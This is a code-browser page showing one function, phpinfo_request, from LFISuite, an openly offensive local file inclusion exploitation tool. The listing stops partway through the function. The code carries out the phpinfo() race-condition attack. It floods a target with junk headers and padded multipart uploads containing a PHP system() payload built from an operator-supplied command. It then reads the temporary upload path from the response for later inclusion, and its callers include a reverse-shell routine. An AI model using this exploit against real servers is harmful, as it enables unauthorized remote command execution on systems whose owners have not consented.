MCPcopy
hub / github.com/D35m0nd142/LFISuite / phpinfo_request

Function phpinfo_request

lfisuite.py:637–706  ·  view source on GitHub ↗
(headers,cmd,path1,path,test,host)

Source from the content-addressed store, hash-verified

635 return got
636
637def phpinfo_request(headers,cmd,path1,path,test,host):
638 rcvbuf = 1024
639 bigz = 3000
640 junkheaders = 30
641 junkfiles = 40
642 junkfilename = '>' * 100000
643 z = "Z" * bigz
644 found = 0
645
646 phpinfo_headers = {'User-Agent':'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8',
647 'Accept-Language':'en-us,en;q=0.5',
648 'Accept-Encoding': 'gzip, deflate',
649 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
650 'Accept-Charset': 'windows-1251,utf-8;q=0.7,*;q=0.7',
651 'z': z,
652 'Connection':'close'}
653
654 if "Cookie" in gen_headers:
655 phpinfo_headers['Cookie'] = gen_headers['Cookie']
656
657 loop = range(0,junkheaders)
658 for count in loop:
659 phpinfo_headers['z%s' %count] = count
660
661 phpinfo_headers['Content-Type'] = 'multipart/form-data; boundary=---------------------------59502863519624080131137623865'
662
663 if("php://" in cmd):
664 cmd = cmd[6:]
665 else:
666 cmd = "system('%s')" %cmd
667 if(";" not in cmd[-2:]):
668 cmd = "%s;" %cmd
669
670 content = """-----------------------------59502863519624080131137623865\nContent-Disposition: form-data; name="tfile"; filename="test.html"\nContent-Type: text/html\n\nAbracadabrA <?php %s ?>\n-----------------------------59502863519624080131137623865--""" %(cmd)
671 loop = range(0,junkfiles)
672
673 for count in loop:
674 content = content + """-----------------------------59502863519624080131137623865\nContent-Disposition: form-data; name="ffile%d"; filename="%d%s"\nContent-Type: text/html\n\nno\n-----------------------------59502863519624080131137623865--\n""" %(count,count,junkfilename)
675
676 phpinfo_headers['Content-Length'] = '%s' %(len(content))
677 got = ""
678 url = "%s%s" %(host,path)
679
680 try:
681 if(phpinfo_reverse):
682 r = requests.post(url=url, headers=phpinfo_headers, data=content)
683 else:
684 r = requests.post(url=url, headers=phpinfo_headers, data=content, timeout=20)
685 except:
686 return got
687
688 resp = r.text
689 if("tmp_name" in resp):
690 found = 1
691 lines = resp.split('\n')
692 for line in lines:
693 if "tmp_name]" in line:
694 mystr = str(line)

Callers 3

phpinfo_reverse_shellFunction · 0.85
run_phpinfoFunction · 0.85

Calls 1

phpinfo_extFunction · 0.85

Tested by

no test coverage detected